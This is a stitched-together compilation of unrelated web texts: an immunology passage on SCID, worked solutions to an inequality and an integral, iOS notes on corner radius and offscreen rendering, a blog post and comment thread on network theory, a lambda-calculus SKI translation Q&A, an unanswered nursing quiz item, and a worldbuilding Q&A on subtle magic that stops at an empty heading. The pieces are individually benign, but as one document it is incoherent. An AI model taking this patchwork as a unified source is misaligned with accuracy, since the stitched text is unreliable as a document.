T cells are a class of white blood cells without which a human being usually cannot survive. An exception to this was David Vetter, a boy who lived 12 years without T cells. This was only possible because he lived all this time in a sterile environment, a plastic bubble. For this reason he became known as the bubble boy. The disease which he suffered from is called SCID, severe combined immunodeficiency, and it corresponds to having no T cells. The most common form of this is due to a mutation on the X chromosome and as a result it usually affects males. The effects set in a few months after birth. The mutation leads to a lack of the $\gamma$ chain of the IL-2 receptor. In fact this chain occurs in several cytokine receptors and is therefore called the ‘common chain’. Probably the key to the negative effects caused by its lack in SCID patients is the resulting lack of the receptor for IL-7, which is important for T cell development. SCID patients have a normal number of B cells but very few antibodies due to the lack of support by helper T cells. Thus in the end they lack both the immunity usually provided by T cells and that usually provided by B cells. This is the reason for the description ‘combined immunodeficiency’. The information which follows comes mainly from two sources. The first is a documentary film ‘Bodyshock – The Boy in the Bubble’ about David Vetter produced by Channel 4 and available on YouTube. (There are also less serious films on this subject, including one featuring John Travolta.) The second is the chapter on X-linked SCID in the book ‘Case Studies in Immunology’ by Raif Geha and Luigi Notarangelo. I find this book a wonderful resource for learning about immunology. It links general theory to the case history of specific patients.
|
# Solve the following
Question:
Solve $\left|\frac{2 x-1}{x-1}\right|>2$
Solution:
As, $\left|\frac{2 x-1}{x-1}\right|>2$
$\Rightarrow \frac{2 x-1}{x-1}<-2$ or $\frac{2 x-1}{x-1}>2 \quad($ As, $|x|>2 \Rightarrow x<-2$ or $x>2)$
$\Rightarrow \frac{2 x-1}{x-1}+2<0$ or $\frac{2 x-1}{x-1}-2>0$
$\Rightarrow \frac{2 x-1+2 x-2}{x-1}<0$ or $\frac{2 x-1-2 x+2}{x-1}>0$
$\Rightarrow \frac{4 x-3}{x-1}<0$ or $\frac{1}{x-1}>0$
$\Rightarrow \frac{4 x-3}{x-1}<0$ or $x-1>0$
$\Rightarrow[(4 x-3>0$ and $x-1<0)$ or $(4 x-3<0$ and $x-1>0)]$ or $[x-1>0]$
$\Rightarrow\left[\left(x>\frac{3}{4}\right.\right.$ and $\left.x<1\right)$ or $\left(x<\frac{3}{4}\right.$ and $\left.\left.x>1\right)\right]$ or $[x>1]$
$\Rightarrow\left[\left(\frac{3}{4}<x<1\right) \text{ or no solution}\right]$ or $[x>1]$
$\Rightarrow \frac{3}{4}<x<1$ or $x>1$
$\therefore x \in\left(\frac{3}{4}, 1\right) \cup(1, \infty)$
|
Paul's Online Notes
### Section 5.4 : More Substitution Rule
11. Evaluate $$\displaystyle \int{{\frac{{8 - w}}{{4{w^2} + 9}}\,dw}}$$.
Hint : With the integrand written as it is here this problem can’t be done.
As written we can’t do this problem. In order to do this integral we’ll need to rewrite the integral as follows.
$\int{{\frac{{8 - w}}{{4{w^2} + 9}}\,dw}} = \int{{\frac{8}{{4{w^2} + 9}}\,dw}} - \int{{\frac{w}{{4{w^2} + 9}}\,dw}}$
Now, the first integral looks like it might be an inverse tangent (although we’ll need to do a rewrite of that integral) and the second looks like it’s a logarithm (with a quick substitution).
So, here is the rewrite on the first integral.
$\int{{\frac{{8 - w}}{{4{w^2} + 9}}\,dw}} = \frac{8}{9}\int{{\frac{1}{{\frac{4}{9}{w^2} + 1}}\,dw}} - \int{{\frac{w}{{4{w^2} + 9}}\,dw}}$
Now we’ll need a substitution for each integral. Here are the substitutions we’ll need for each integral.
$u = \frac{2}{3}w\,\,\,\,\,\,\left( {{\mbox{so }}{u^2} = \frac{4}{9}{w^2}} \right)\hspace{0.75in}v = 4{w^2} + 9$
Here is the differential work for the substitution.
$du = \frac{2}{3}dw\hspace{0.25in} \to \hspace{0.25in}dw = \frac{3}{2}du\hspace{0.5in}dv = 8w\,dw\,\,\,\,\,\,\, \to \hspace{0.25in}\,w\,dw = \frac{1}{8}dv$
Now, doing the substitutions and evaluating the integrals gives,
\begin{align*}\int{{\frac{{8 - w}}{{4{w^2} + 9}}\,dw}} & = \frac{8}{9}\left( {\frac{3}{2}} \right)\int{{\frac{1}{{{u^2} + 1}}\,du}} - \frac{1}{8}\int{{\frac{1}{v}\,dv}} = \frac{4}{3}{\tan ^{ - 1}}\left( u \right) - \frac{1}{8}\ln \left| v \right| + c\\ & = \require{bbox} \bbox[2pt,border:1px solid black]{{\frac{4}{3}{{\tan }^{ - 1}}\left( {\frac{2}{3}w} \right) - \frac{1}{8}\ln \left| {4{w^2} + 9} \right| + c}}\end{align*}
Do not forget to go back to the original variable after evaluating the integral!
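As a quick check, differentiating the result recovers the integrand:
$\frac{d}{{dw}}\left[ {\frac{4}{3}{{\tan }^{ - 1}}\left( {\frac{2}{3}w} \right) - \frac{1}{8}\ln \left| {4{w^2} + 9} \right|} \right] = \frac{4}{3}\,\frac{{\frac{2}{3}}}{{\frac{4}{9}{w^2} + 1}} - \frac{1}{8}\,\frac{{8w}}{{4{w^2} + 9}} = \frac{8}{{4{w^2} + 9}} - \frac{w}{{4{w^2} + 9}} = \frac{{8 - w}}{{4{w^2} + 9}}$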
|
# How to set corner radius in iOS
Issue #582
## Use View Debugging
Run on device, Xcode -> Debug -> View debugging -> Rendering -> Color blended layer
On Simulator -> Debug -> Color Blended Layer
Okay. Talked to a Core Animation engineer again:
• cornerRadius was deliberately improved in Metal so it could be used everywhere.
• Using a bitmap is WAY heavier in terms of memory and performance.
• CALayer maskLayer is still heavy.
Setting the radius to a value greater than 0.0 causes the layer to begin drawing rounded corners on its background. By default, the corner radius does not apply to the image in the layer’s contents property; it applies only to the background color and border of the layer. However, setting the masksToBounds property to true causes the content to be clipped to the rounded corners.
When the value of this property is true, Core Animation creates an implicit clipping mask that matches the bounds of the layer and includes any corner radius effects. If a value for the mask property is also specified, the two masks are multiplied to get the final mask value.
layer.cornerRadius, with or without layer.maskedCorners, causes blending.
Use a mask layer instead of layer.cornerRadius to avoid blending; note that the mask itself causes offscreen rendering.
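A minimal UIKit sketch of the two approaches (the view class, method names and radius value here are illustrative, not from the engineer's notes):

```swift
import UIKit

final class RoundedView: UIView {
    private let radius: CGFloat = 12

    // Option 1: cornerRadius (+ masksToBounds to clip contents).
    // Cheap since the Metal-backed improvements, but the layer
    // shows up under "Color Blended Layers".
    func roundViaCornerRadius() {
        layer.cornerRadius = radius
        layer.masksToBounds = true
    }

    // Option 2: a CAShapeLayer mask.
    // Avoids blending, but forces offscreen rendering.
    func roundViaMask() {
        let shape = CAShapeLayer()
        shape.path = UIBezierPath(roundedRect: bounds, cornerRadius: radius).cgPath
        layer.mask = shape
    }

    override func layoutSubviews() {
        super.layoutSubviews()
        // The mask does not auto-resize; rebuild its path when bounds change.
        (layer.mask as? CAShapeLayer)?.path =
            UIBezierPath(roundedRect: bounds, cornerRadius: radius).cgPath
    }
}
```

Which option wins likely depends on how many rounded layers are animating at once; the debug colors above are the way to verify.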
## Offscreen rendering
Instruments’ Core Animation Tool has an option called Color Offscreen-Rendered Yellow that will color regions yellow that have been rendered with an offscreen buffer (this option is also available in the Simulator’s Debug menu). Be sure to also check Color Hits Green and Misses Red. Green is for whenever an offscreen buffer is reused, while red is for when it had to be re-created.
Offscreen drawing on the other hand refers to the process of generating bitmap graphics in the background using the CPU before handing them off to the GPU for onscreen rendering. In iOS, offscreen drawing occurs automatically in any of the following cases:
Core Graphics (any class prefixed with CG)
The drawRect() method, even with an empty implementation.
CALayers with a shouldRasterize property set to YES.
Any text displayed on screen, including Core Text.
Group opacity (UIViewGroupOpacity).
|
## Categorical Foundations of Network Theory
Jacob Biamonte got a grant from the Foundational Questions Institute to run a small meeting on network theory:
It’s being held 25-28 May 2015 in Turin, Italy, at the ISI Foundation. We’ll make slides and/or videos available, but the main goal is to bring a few people together, exchange ideas, and push the subject forward.
### The idea
Network theory is a diverse subject which developed independently in several disciplines. It uses graphs with additional structure to model everything from complex systems to theories of fundamental physics.
This event aims to further our understanding of the mathematical theory underlying the relations between seemingly different networked systems. It’s part of the Azimuth network theory project.
### Timetable
With the exception of the first day (Monday May 25th) we will kick things off with a morning talk, with plenty of time for questions and interaction. We will then break for lunch at 1:00 p.m. and return for an afternoon work session. People are encouraged to give informal talks and to present their ideas in the afternoon sessions.
#### Monday May 25th, 10:30 a.m.
Jacob Biamonte: opening remarks.
For Jacob’s work on quantum networks visit www.thequantumnetwork.org.
John Baez: network theory.
For my stuff see the Azimuth Project network theory page.
#### Tuesday May 26th, 10:30 a.m.
David Spivak: operads. Operads are a formalism for sticking small networks together to form bigger ones. David has a 3-part series of articles sketching his ideas on networks.
#### Wednesday May 27th, 10:30 a.m.
Eugene Lerman: continuous time open systems and monoidal double categories.
Eugene is especially interested in classical mechanics and networked dynamical systems, and he wrote an introductory article about them here on the Azimuth blog.
#### Thursday May 28th, 10:30 a.m.
Tobias Fritz: ordered commutative monoids and theories of resource convertibility.
Tobias has a new paper on this subject, and a 3-part expository series here on the Azimuth blog!
### Location and contact
ISI Foundation
Via Alassio 11/c
10126 Torino — Italy
Phone: +39 011 6603090
Email: [email protected]
Theory group details: www.TheQuantumNetwork.org
### 23 Responses to Categorical Foundations of Network Theory
1. Eugene Lerman says:
It feels a bit funny to read that I do/am interested in classical mechanics. I have done a bit of symplectic geometry and Hamiltonian systems. I suppose one can argue these are the same things as classical mechanics… :)
What are hot topics in classical mechanics these days? Non-holonomic systems?
• John Baez says:
Isn’t “Hamiltonian systems” just the way people with a Ph.D. say “classical mechanics”?
What are hot topics in classical mechanics these days?
Network theory!
• Eugene Lerman says:
John wrote
Network theory!
in response to:
What are hot topics in classical mechanics these days?
But we have no idea even where to start to build a theory of networks of Hamiltonian systems!
• Eugene Lerman says:
Isn’t “Hamiltonian systems” just the way people with a Ph.D. say “classical mechanics”?
Not really. Some classical systems are not conservative. I know a few that voted for Obama.
• John Baez says:
Eugene wrote:
But we have no idea even where to start to build a theory of networks of Hamiltonian systems!
No idea even where to start? I don’t think it’s that bad. Port-Hamiltonian systems are the way people usually tackle this issue—and if people are doing things suboptimally, we can improve it. We really should tackle this issue soon, before everyone and his brother jumps aboard the network theory bandwagon.
• Arjan van der Schaft, Port-Hamiltonian systems: an introductory survey, Proceedings of the International Congress of Mathematicians, Madrid, Spain, 2006.
Abstract. The theory of port-Hamiltonian systems provides a framework for the geometric description of network models of physical systems. It turns out that port-based network models of physical systems immediately lend themselves to a Hamiltonian description. While the usual geometric approach to Hamiltonian systems is based on the canonical symplectic structure of the phase space or on a Poisson structure that is obtained by (symmetry) reduction of the phase space, in the case of a port-Hamiltonian system the geometric structure derives from the interconnection of its sub-systems. This motivates to consider Dirac structures instead of Poisson structures, since this notion enables one to define Hamiltonian systems with algebraic constraints. As a result, any power-conserving interconnection of port-Hamiltonian systems again defines a port-Hamiltonian system. The port-Hamiltonian description offers a systematic framework for analysis, control and simulation of complex physical systems, for lumped-parameter as well as for distributed-parameter models.
If they’re talking about it at the ICM it must be hot, right?
And “any power-conserving interconnection of port-Hamiltonian systems again defines a port-Hamiltonian system” suggests there’s a compact closed category with port-Hamiltonian systems as morphisms, and/or an operad describing how to connect them.
• Eugene Lerman says:
I have looked at Port-Hamiltonian systems. Let’s just say that I am very sceptical that they do what they say and say what they do, rather than publicly badmouth an ICM speaker.
• John Baez says:
Well, if something is not right we can fix it, so I don’t think “we don’t even know where to start”: we can start with what people are doing, fix mistakes, and make everything elegant. And the good thing is, there are lots of well-known examples of port-Hamiltonian systems, which can guide us.
• Eugene Lerman says:
How do you fix a formalism that has variables dual to position variables? Position variables live in a manifold. I never heard of manifolds having vector space duals.
How do you fix a formalism for which Dirac structures in local coordinates are not skew-symmetric? When people don’t distinguish between a Riemannian metric and a symplectic form, I get very confused.
• John Baez says:
I never heard of manifolds having vector space duals.
But they have cotangent bundles.
Having spent a lot of time talking to physicists, I find they’re often on the right track even if they use words differently (i.e., wrong) or screw up some stuff. Anyway, you’ve gotten me eager to straighten out this subject. The more problems there are, the more fun it’ll be! The numerous examples will help us figure out what to do.
2. Eugene Lerman says:
Having spent a lot of time talking to physicists, I find they’re often on the right track even if they use words differently (i.e., wrong) or screw up some stuff. Anyway, you’ve gotten me eager to straighten out this subject.
I am glad you want to sort this out.
Here is an example I have no idea how to formulate in terms of port-Hamiltonian systems/bond graphs/what not. Take two particles on a 2-sphere interacting by way of a potential (say they are connected by a spring). It’s a network consisting of two nodes. For each node you have the cotangent bundle of a sphere. Now how do you tear it apart and put it back together? What are efforts/flows here?
• John Baez says:
Here you are ‘coupling’ two systems by taking the product of their phase spaces and then adding a term to the Hamiltonian that depends on variables from each system.
I think electrical engineers are more used to ‘composing’ two systems, by identifying some variables of one system with those of the other. In composition, you create a new phase space that’s a pushout of two other phase spaces. For example, this is what happens when you attach two electrical circuits by connecting some wires from one to wires from another: you identify some currents and potentials in the first circuit with some currents and potentials in the second.
So, I think these are different operations—and I’ve spent a lot more time thinking about composition than about coupling. I can understand some forms of composition, at least, as composition of morphisms in cospan categories. Composing cospans is done by pushout.
But composition may be a limiting case of coupling! If, in your example, we take a limit where the potential between the two particles becomes huge except when they have the same position, and zero when they’re at the same position, this will force their positions and momenta to be equal.
Of course, coupling is a special case of ‘changing the Hamiltonian by adding an extra term’. After we’ve built up a complicated networked system by composing subsystems, we can study perturbations of Hamiltonians where we add extra terms that only depend jointly on two subsystems when those subsystems ‘touch’. That’s what I’d be inclined to do, anyway.
• Eugene Lerman says:
I don’t disagree with you. And it looks like you don’t disagree with me either — there is no theory of networks of Hamiltonian systems yet and it’s not clear how to start building it.
At some point a year or two ago I toyed with the idea of coupling mechanical systems by using (generalized) forces. The geometry of such a setup looked like a fun thing to play with. Unfortunately I didn’t (and don’t) have enough physical examples to check if this exercise was going to be on the right track; if it was going to make physical sense.
• John Baez says:
John wrote:
I think electrical engineers are more used to ‘composing’ two systems, by identifying some variables of one system with those of the other. In composition, you create a new phase space that’s a pushout of two other phase spaces. For example, this is what happens when you attach two electrical circuits by connecting some wires from one to wires from another: you identify some currents and potentials in the first circuit with some currents and potentials in the second.
I should have said “pullback”, not “pushout”. We’re taking a product of two phase spaces and then taking an “equalizer” where we demand that some functions on the first equal some functions on the other—for example, some currents and voltages in one circuit equal currents and voltages in another. Doing a product and then an equalizer in this way is doing a pullback.
I slipped because I often think of electrical circuits as graphs with extra structure, and to compose these we do a pushout. But the functor from graphs to phase spaces is contravariant, and it carries pushouts to pullbacks.
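Spelled out with generic names (the maps $f_i$ here are just placeholders for the boundary-variable assignments): given $f_1 \colon X_1 \to Y$ and $f_2 \colon X_2 \to Y$ sending each circuit’s phase space to its shared currents and potentials, the composite space is

$P = \{(x_1, x_2) \in X_1 \times X_2 \,:\, f_1(x_1) = f_2(x_2)\}$

that is, the product $X_1 \times X_2$ followed by the equalizer of $f_1 \circ \mathrm{pr}_1$ and $f_2 \circ \mathrm{pr}_2$, which is exactly the pullback of $f_1$ and $f_2$.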
Eugene wrote:
I don’t disagree with you. And it looks like you don’t disagree with me either — there is no theory of networks of Hamiltonian systems yet and it’s not clear how to start building it.
I’m afraid disagreement isn’t a symmetric relation. Well, okay: it’s not exactly “clear” how to build the theory of networks of Hamiltonian systems—but it doesn’t seem hard, either.
• Eugene Lerman says:
The category of manifolds in general and symplectic manifolds in particular don’t have pullbacks. Do you want to look at derived pullbacks?
3. lee bloomquist says:
Tangentially perhaps, is there some possibility of discussing the Chu space category?
4. Eugene Lerman says:
John wrote:
I’m thinking I can get away with using any convenient category of smooth spaces.
I think we’d be better off with $C^\infty$ schemes. $C^\infty$ schemes have a good notion of a Poisson algebra. But nothing is worked out.
• John Baez says:
I’ve made a bunch of progress, and my ideas have changed a bit, but I’ll wait and explain this at the workshop. I’m sure there’s a lot of fun stuff to do here.
This May, a small group of mathematicians is going to a workshop on the categorical foundations of network theory, organized by Jacob Biamonte. I’m trying to get us mentally prepared for this. We all have different ideas, yet they should fit together somehow.
Tobias Fritz, Eugene Lerman and David Spivak have all written articles here about their work, though I suspect Eugene will have a lot of completely new things to say, too. Now it’s time for me to say what my students and I have been doing.
6. Here’s a new paper on network theory:
• John Baez and Brendan Fong, A compositional framework for passive linear networks.
While my paper with Jason Erbele, Categories in control, studies signal flow diagrams, this one focuses on circuit diagrams. The two are different, but closely related.
7. We’re getting ready for the Turin workshop on the Categorical Foundations of Network Theory. So, we’re trying to get our thoughts in order. A bunch of blog articles seems like a good way to go about it.
8. John Baez says:
Someone asked me what the workshop achieved. I replied:
First, we figured out a lot about how the approach Brendan Fong and I are using to describe networks (“decorated cospans”) is related to the approach David Spivak uses (“the operad of wiring diagrams”). David and a student and Brendan will try to prove some theorems about this and write this up.
Second, Eugene Lerman and I made some progress understanding each other’s thoughts on networks of nonlinear classical mechanical systems. There’s a short paper I should write on this, but I’m being distracted…
… by my new work with Brendan and Blake Pollard on networks in stochastic thermodynamics! This seems more urgent to me, since I believe it will help us understand living systems.
|
# Lambda calculus: composition of SKI
I am doing some exercises on writing a lambda term as a composition of the terms: S=$\lambda$xyz.xz(yz), K=$\lambda$xy.x, I=$\lambda$x.x. I know that all lambda terms can be written using S, K and I with the following rules: 0) $\lambda$x.Fx=F if x is not in F; 1) $\lambda$x.x=I; 2) $\lambda$x.F=KF if x is not in F; 3) $\lambda$x.FL=S($\lambda$x.F)($\lambda$x.L) if x is in F or in L. I did some exercises with simple $\lambda$-terms, but when it comes to more complicated ones I have difficulties. For example, what if the $\lambda$-term is of the kind $\lambda$xyz.LF and there is an abstraction inside L or F? For example $\lambda$xyz.x(zy($\lambda$x.xz)). Shall I first write the inner abstraction ($\lambda$x.xz) as a combination of S, K and I and then go on? Is it correct that, since x comes before z in this abstraction (it has the form $\lambda$x.xz, not $\lambda$x.Fx), I can't apply rule 0)?
You should work out the inner abstractions first, as the translation from $\lambda$-terms to $SKI$ clearly specifies. For completeness' sake, allow me to present the said translation more formally below.
Let $\Lambda$ be the set of $\lambda$-terms, as defined by $$M,N ::= x\ |\ (MN)\ |\ (\lambda x M)$$ and $\mathcal{C}$ the set of $SKI$-terms, as defined by $$F, G ::= x\ |\ (FG)\ |\ \textbf{S}\ |\ \textbf{K}\ |\ \textbf{I}$$
Define the translation $(\cdot)_{\mathcal{C}}: \Lambda\rightarrow\mathcal{C}$ recursively as:
• $x_{\mathcal{C}} = x$
• $(MN)_{\mathcal{C}} = (M_\mathcal{C}N_\mathcal{C})$
• $(\lambda xM)_{\mathcal{C}} = (\lambda^*x M_\mathcal{C})$
where, for every $F\in\mathcal{C}$ and every $x$ variable, $\lambda^*x F \in\mathcal{C}$ is the meta-term given according to the following clauses (the algorithm abcf):
• a) $\lambda^*xF = \textbf{I}$, if $F=x$
• b) $\lambda^*xF = \textbf{K}F$, if $x\not\in FV(F)$
• c) $\lambda^*xF = G$, if $F=Gx$ and $x\not\in FV(G)$
• f) $\lambda^*xF = \textbf{S}(\lambda^*x G_1)(\lambda^*x G_2)$, if $F=(G_1G_2)$ and neither (b) nor (c) applies.
Notice the equation $(\lambda xM)_{\mathcal{C}} = (\lambda^*xM_{\mathcal{C}})$: it clearly tells us to work out the inner abstractions first. By the way, you may also remove the (c) clause from the definition of $\lambda^*xF$.
If you want to write a $\lambda$-term as a product in the $SKI$-combinators (up to $\alpha\beta\eta$-equivalence), you can think of realizing, in an arbitrary context of finitely many unbound variables, an arbitrary function in a single bound variable through the following three basic functions: the identity function $I$, the constant function $K c$ on a value $c$, and the function $S p q$ realizing the termwise product of the functions realized by $p$ and $q$.
For this, first check if the output of your function is independent on the argument, or if it is the argument itself, or if it is a product of two terms, and use $I$, $K$ or $S$ in these cases, respectively. If none of these three rules apply, the output of your function is itself a function, i.e. a $\lambda$-abstraction in some new variable. In this case, put your current variable on the stack of constant/unbound variables and first realize the function in the new, bound variable. Afterwards, when this inner function is realized as a product in the $SKI$-combinators, proceed to realize your original function using the first three rules.
Now to your example, the $\lambda$-term $\lambda x y z.\, x(zy(\lambda x.xz))$. In the beginning, you have neither bound nor unbound variables, but your constant value is a function in the variable $x$. So make $x$ the 'active' variable and try to realize $\lambda y z.\, x(zy(\lambda x.xz))$. Again we meet a function abstraction in $y$, so make $y$ the active variable while considering $x$ constant. Then again, make $z$ active and consider $y$ constant, which leaves you with the problem of realizing $z\mapsto x(zy(\lambda x.xz))$. Here the $S$-rule applies several times, realizing the function as $S(Kx)(S(SI(Ky))t)$, where $t$ is the still-to-be-found term realizing $z\mapsto \lambda x.xz$. Here again, you meet an abstraction, which you (w.l.o.g.) rename to $\lambda w.wz$, and play the same game to realize the inner function $w\mapsto wz$ as $SI(Kz)$. Hence, $z\mapsto \lambda x.xz\sim SI(Kz)=(SI)(Kz)$ is realized by $t = S(K(SI))(S(KK)I)$, so $z\mapsto x(zy(\lambda x.xz))$ is realized by $S(Kx)(S(SI(Ky))(S(K(SI))(S(KK)I)))$. I hope it's clear now how you would, in principle, do the remaining abstractions over $x$ and $y$.
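As a quick sanity check that $SI(Kz)$ really realizes $w\mapsto wz$, reduce it against an argument $w$:
$$S\,I\,(Kz)\,w \to I\,w\,(Kz\,w) \to w\,(Kz\,w) \to w\,z$$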
|
# A six-year-old is being discharged following eye surgery. Which intervention should the RN assign to the...
###### Question:
A six-year-old is being discharged following eye surgery. Which intervention should the RN assign to the nursing assistive personnel (NAP)?
A. Provide discharge instructions to the parents.
B. Escort the patient and parents to the car.
C. Remove the patient’s intravenous catheter.
D. Apply a new eye patch for the patient.
|
# A Most Subtle Magic
Rynn is not flashy at all. In fact, you would be forgiven for thinking she's a bit of an introvert. Sure, the people in the town are strangely reluctant to talk to you about her, but you are a newcomer, and after a few drinks tongues eventually loosen up.
Sick children do seem to get better after eating her oatmeal cookies, you are told, but others quickly add that that might simply be because they believe they would. And she did ask for a local brewer's help moving some furniture the very morning his fermentation vat blew up half his house. And there was that time when she happened to be fishing on the lake just as two reckless boys swam too far, got trapped in the weeds and would probably have drowned if not for her. Oh, and the curious incident with the thieves who not only returned her purse but also made a large donation to the orphanage. And... actually, there's a surprisingly large number of such events and coincidences. Silence descends upon the bar as people gradually make excuses to go away.
You suddenly have a strange, absolute, gut-certainty that if someone were to throw a stone at her head while she was turned away she'd just happen to bend down to tighten her shoelaces at that exact moment. Or perhaps she'd trip over a root. You briefly wonder: Is Rynn a witch? That thought is quickly replaced by another: Nah, you're just being paranoid. You put your beer down, shake your head and head out.
Assume you have someone performing public magic in such a way that it's virtually indistinguishable from luck, or coincidence. Just how much magic can one get away with? I'm thinking specifically:
• Telekinesis (moving small and not so small objects without appearing to exercise any direct influence)
• Divination (seeing across future scenarios and actively guiding the future towards a preferred outcome)
• Evocation (manipulating energy, such as weather, fire, electricity etc)
How should a mage act to make her less likely to be detected? What kind of beliefs in society would help most with remaining undetected?
• I love the way you set up your questions! – Aaru Mar 26 '15 at 2:24
• There's a lot of background information that will influence the answers to your question(s). This includes things like whether people know about magic existing in this world, what technology they have access to and how the predominant religions are set up. – Jasper Mar 26 '15 at 10:50
• This is really three questions in one and each could be answered with a very lengthy response. Further, as people address each aspect of the question you may find it difficult to select one as "accepted" if one had a great answer for the first question, and another had a great answer for the second question. Consider splitting broad questions like this into multiple questions in the future. – Adam Davis Mar 26 '15 at 11:48
• More questions ought to have the phrase "read Terry Pratchett" in them. +1. – IchabodE Mar 26 '15 at 21:48
• Rynn's life reminds me of the Piers Anthony character Bink, who was magically protected his whole life, but he never knew it until he was directly attacked and it became obvious. Are you assuming that Rynn knows about her powers? – Jeremy Nottingham Mar 27 '15 at 11:33
Beautiful Question Prep!
Subtle, beneficial magic, wrapped in a shy and unassertive package, unobtrusively making life better for those that she cares for... Rynn falls so far from the witch stereotype that I doubt anyone would ever make the connection. They might think she was charmed, that angels watched over her and kept her from harm. She would be the town's lucky penny, their precious secret. In time, as her life sailed smoothly past the jagged rocks that harass and befuddle everyone else, she would come to be known as wise. Quiet little Rynn, who never speaks up or pushes people around, would have a mighty authority among the townsfolk, and few would stand their ground on any issue when she politely took the other side.
...but that is in her future. The younger, apparently innocent and undeniably blessed young lady is the character you have today, and she is a wonderful starting place for all kinds of stories.
How far could she push it without scaring her friends? I don't think there is any limit: as long as she is generous with the townsfolk and never blatantly hurts anyone, she will continue to be seen as, at her worst, harmless.
More important than the scale of the magic she casts would be the indirectness with which she casts it. She would always want to make it look like things just happen around her; not that she makes things happen. Hurricanes change paths despite what the weather man predicts, sparing the town and surrounding farms. Rain always falls in their valley no matter how bad a drought the rest of the country is dealing with. None of the town-folks ever locks their keys in their cars... every time they think they've done it, they always find that one of the doors isn't locked. The local locksmith has closed up shop and moved to another town.
I am tempted to say that placing your story in an enlightened, scientific age such as today would greatly enhance your character's ability to hide her talents. In this modern world, she could literally conjure dragons right in front of us and we would still be looking for where the mirrors were hidden as the winged ones ate us. Still, you've introduced this character as cherished by her friends, with shyness and humility to further conceal her power. With those attributes, I think she could live anywhen and nobody would ever mistake her for what she truly is.
This is a beautiful character which should be a blast to work into some of your writing. Good luck with her!
• Pretty good, but... Rain always falls in their valley no matter how bad a drought the rest of the country is dealing with. That sounds like a good way to attract suspicion and jealousy from the rest of the country. And after a few drinks tongues eventually loosen up, and then outsiders start to find out about Rynn... – Mason Wheeler Mar 26 '15 at 14:34
• Captured her exactly! – Serban Tanasa Mar 30 '15 at 1:19
Telekinesis is a tough one. Humans are quite good at calculating trajectories, and unless the magician does something that could be interpreted as the chance interaction of a gust of wind or a lucky/unlucky bounce, altering the trajectory of an object would be noticed. That's something that some CGI movies struggle with.
Divination is an easy one, as long as the magician can make things look like a coincidence. Not being in harm's way is a good one, but a careful magician might allow themselves to take small amounts of harm so as to deflect attention from the fact that they're not taking serious damage.
Headology can be tricky. It can be pretty obvious, or quite subtle. If a magician restricts themselves to the possible, it could only be detected if two witnesses to an event have significantly different recollections of an event. Making someone remember a giant purple elephant in their cupboard would be pretty obvious.
As in the example story, if a magician acts to make their magic look like nothing more than a whole lot of coincidences and luck happening to them, while also ensuring that other people around them are lucky, such magic could be discounted for quite some time; and given that the "luck" seems to rub off on bystanders, others would be reluctant to act against the magician for fear of losing their luck.
Obviously, if such a magician's enemies started suffering misfortunes beyond any reasonable resemblance to the normal variance of chance, people might get suspicious. However, if the magician simply altered other people's opinion of their enemies in a subtle way, reducing society's levels of popularity and respect, and increasing annoyance with their foe, the magician could see to it that their enemies were run out of town or lynched, and the townsfolk would hardly notice, and would probably think that it was their own idea. After all, "Joe always was a pain in the ass, and it's not fair to say he only tormented Rynn when he made everyone's life miserable."
• Two witnesses having significantly different memories of an event happens all the time. Human memory is very fallible and quite unreliable even under good circumstances. – pluckedkiwi Mar 26 '15 at 18:08
• Your definition of Headology seems a bit off from the official one. It's basically a different word for psychology, so all you are doing is talking to someone, and because of what you say you make them form certain opinions or ideas. You can't make someone remember something unless you can get them to agree on a fundamental level that what you're saying is what happened. Unless you can convince them the purple elephant was there, they won't remember it that way. Source: wiki.lspace.org/mediawiki/Headology – Cronax Mar 27 '15 at 12:33
• Really wanted to accept this one as well! – Serban Tanasa Mar 30 '15 at 1:20
• @pluckedkiwi Ah, good ol' false memories, more recently seen in the "Mandela Effect". – Bob Feb 10 '16 at 6:44
## Telekinesis
You can affect objects already moving in complex patterns. People would be a good example: a person slipping or tumbling for no detectable reason is weird, but would easily and naturally be overlooked if something large falls where they would have been had they not slipped.
Discontinuities are also good targets. Even if an object has a predictable trajectory that you can't mess with without it looking unnatural, it can still bounce weirdly when it hits a wall or the ground without that being a major issue.
Objects can also be messed with when nobody is looking at them. Objects above or behind the people present can be made to fall down as a distraction, and it will look natural enough. An attack looks more unnatural, as the "odds" of accidentally hitting someone are longer and people pay more attention to events with concrete consequences; but if you time it to coincide with something that could trigger the fall, such as a heavy door slamming or something heavy falling, you can get away with it.
You can also mess with equipment. Fuses are supposed to trip occasionally, so if you can use telekinesis to make a fuse trip and turn out the lights, you can get away with that easily enough. Likewise, if nobody actually has a reason to know which position some switch is in, you can flip it even if that has some consequence later.
And you can use telekinesis for set-up. For example, instead of making somebody slip, you can, while nobody is looking, make something slippery spread itself over the surface people will move over later. You can telekinetically open a lock just before somebody else tries to open the door. You can make a door somebody is trying to force open break more easily than it really would have. You can even make an object several people are trying to move move more easily, because everyone will assume the others are doing more. It even works when only one person is trying to move it, if they are not really paying attention because of some emergency. Which covers most times you'd want to use telekinesis anyway.
You can also use telekinesis to avoid something. To make people not slip on a slippery surface. To make people not lose their balance on a narrow ledge. To make a door somebody is trying to break not break...
## Divination
The basic issue is really that nobody knows how this could work. Mostly this depends on how much advance warning you get. If it is only a few seconds, it is impossible to hide; if a few hours or more, nobody will ever even notice you interfered to prevent something that never happened. For example, you could simply spend time with the boys so they never swim too far, or go fishing with some other person who takes attention away from you when saving the boys. You can use your telekinesis to make minor repairs on things that would fail: to open a clogged safety valve on a fermentation vat, or to make a leak that lets out the pressure safely and forces the vat to be replaced.
You can mess with how people remember the events, right? Even without magic it is fairly easy to convince people that your idea was their idea. People take credit for ideas they like naturally, without any urging. With magic to read people and make yourself less memorable, there shouldn't be any real issue. Real-world mystics and diviners can do some pretty impressive feats without a shred of magic, simply by taking advantage of how people think. This is probably what Pratchett was referring to with "headology", really.
## Evocation
You can make things colder or hotter, or cause electric surges to disable equipment, without too many problems.
Making things colder might, for example, slow down some process or make something more fragile. It would also be a good attack against people and animals outside in cold weather. It feels fairly natural, and even a small drop will seriously sap your energy level, as the body will use as much energy as it can to prevent hypothermia. Hypothermia can also keep people alive longer in the right circumstances.
Increasing temperature can also be an effective attack in warm environments for similar reasons. Temperature can be useful in opening stuck locks or doors. And being able to increase heat can be a life saver for people vulnerable to hypothermia.
If you can cause large temperature changes in small areas you can unstick almost anything and probably even disinfect wounds.
Electric surges have obvious value in an age filled with electric devices. And electronics is vulnerable to even quite small surges if accurately targeted.
## Anonymity
